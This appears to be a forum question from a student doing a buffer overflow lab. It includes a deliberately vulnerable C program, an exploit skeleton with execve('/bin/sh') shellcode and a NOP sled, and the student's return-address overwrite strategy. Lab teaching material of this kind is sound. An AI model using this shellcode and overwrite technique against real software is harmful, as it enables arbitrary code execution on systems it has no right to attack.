# exploit.c -- buffer overflow

Tags: c, security, buffer, buffer-overflow

I am writing exploit.c for my buffer overflow program and am lost trying to get return address. The code return below is my strategy, where `ret` would be the return address.

How do I get this return address from the gdb? (Base code is at the end.)

My strategy was to set a break point at bof function in stack and run the code and use the saved eip there as the return address.

```
long* ptr = (long*)(buffer + 24);
 ret = 0x-------;
*ptr = ret;
 strcpy(buffer + 517 - strlen(shellcode), shellcode);
```

Shouldn't this piece of code do the job for me? Why do I need to fill any part of buffer array with other information?

---

Base code:

```
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[24];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */ 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
```

Comment: The `get_sp` function does nothing meaningful because the author did not understand inline asm. It copies the stack pointer to the `eax` register, but then does nothing with it, assuming (invalidly) that  it will still be there when the function returns. The correct form would be `unsigned ret; __asm__("mov %%esp,%0" : "=r"(ret)); return ret;`

Comment: Possible duplicate of [Buffer Overflow Vulnerability Lab problems](https://stackoverflow.com/questions/14916004/buffer-overflow-vulnerability-lab-problems)